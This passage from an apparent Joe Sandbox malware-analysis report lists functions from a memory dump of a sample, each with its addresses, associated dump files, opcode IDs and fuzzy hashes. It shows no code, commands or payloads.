                                                              • Instruction Fuzzy Hash: A6E12771A087158FD718DE28D8C072AB7E2EFC4314F188ABDE99687381E774DE15A742
                                                              Function 008900E0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H
                                                              • API String ID: 0-2852464175
                                                              • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                              • Instruction ID: a3521322779fa5b4a0da74ae33c80c37fbf3ae67f5903c1e3277aa49862e4a0c
                                                              • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                              • Instruction Fuzzy Hash: FB919231B082558FCF19EE1CC49012EB7E3FBC9314F2A856DD996D7391DA31AC468B86
                                                              Function 00B14410 Relevance: .3, Instructions: 316COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbeb695e1f5e04e61de4bec130a78b5e83c3c00f9236f86b5ed9db62ba1e9daf
                                                              • Instruction ID: 992bb1bb21739eca7f2bc6ab889ddbda7ddf2069de224ffe8717c80648694859
                                                              • Opcode Fuzzy Hash: cbeb695e1f5e04e61de4bec130a78b5e83c3c00f9236f86b5ed9db62ba1e9daf
                                                              • Instruction Fuzzy Hash: 7CC18D75604B018FD324CF29C4D0AAAB7E2FF86314F5489ADE4AA87791D734E885CB51
                                                              Function 00890420 Relevance: .3, Instructions: 289COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f57790fc9442d0c129ae6c3bd1a915ddae62763f18f3c9809363f70497540787
                                                              • Instruction ID: 60cf91541a4e2837e030cf9a850d4306c81643992085b31aa631dda87ab2d44e
                                                              • Opcode Fuzzy Hash: f57790fc9442d0c129ae6c3bd1a915ddae62763f18f3c9809363f70497540787
                                                              • Instruction Fuzzy Hash: 58A1F1726083118FCB14EE28C48062AB7E6FBC6314F5E862DE595DB391E735DC468F85
                                                              Function 0088C770 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
                                                              • Instruction ID: daea6286080855b0d8d56bb04fa36bb550400fa45296c3c24ab6c1d4d1b99bca
                                                              • Opcode Fuzzy Hash: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
                                                              • Instruction Fuzzy Hash: 0FA19471A001598FEB38DE29CC81FDA73E2FB88310F0A8565ED59DF395EA30AD458791
                                                              Function 0088C320 Relevance: .3, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9210fb6dc13fe83acb86e870d50ba5b2b391de8c718c48930b40715f44f37c8c
                                                              • Instruction ID: 1e561abd924d8200c2cf491644c8575bd30c6c64667f7d652fbebd65baf8a86c
                                                              • Opcode Fuzzy Hash: 9210fb6dc13fe83acb86e870d50ba5b2b391de8c718c48930b40715f44f37c8c
                                                              • Instruction Fuzzy Hash: BEC10571914B459BD722DF38C881BE6F7E1FF99300F108A1DE9EAA6241EB707584CB51
                                                              Function 00B26730 Relevance: .2, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d324ce9f0d35315f9a0a71ab6af2a31750fee7f0d7ddf3032e0ef53f62276945
                                                              • Instruction ID: b0614e8ba0e436ef7947c2490f4285676077b3fd8475ffe9716b6c116302cc29
                                                              • Opcode Fuzzy Hash: d324ce9f0d35315f9a0a71ab6af2a31750fee7f0d7ddf3032e0ef53f62276945
                                                              • Instruction Fuzzy Hash: 72810972D14B928BD3148F24D8806B6B7E0FFDB310F249B5EE8EA1A742E7749581C780
                                                              Function 00826810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777
                                                              • Opcode ID: 8bd63deb9a14381bac38bfffab33ca9ee98ccbe8ef62d0edd34f54b20d258cc9
                                                              • Instruction ID: eef363a1236c0b7abddfb19cd4385acedcca21e16082d5202bbdf074c008d1a2
                                                              • Opcode Fuzzy Hash: 8bd63deb9a14381bac38bfffab33ca9ee98ccbe8ef62d0edd34f54b20d258cc9
                                                              • Instruction Fuzzy Hash: 4AB155719083B56BDB359A24F89073ABBD8FF55324F18052EE8C6C6181FB25C9F48752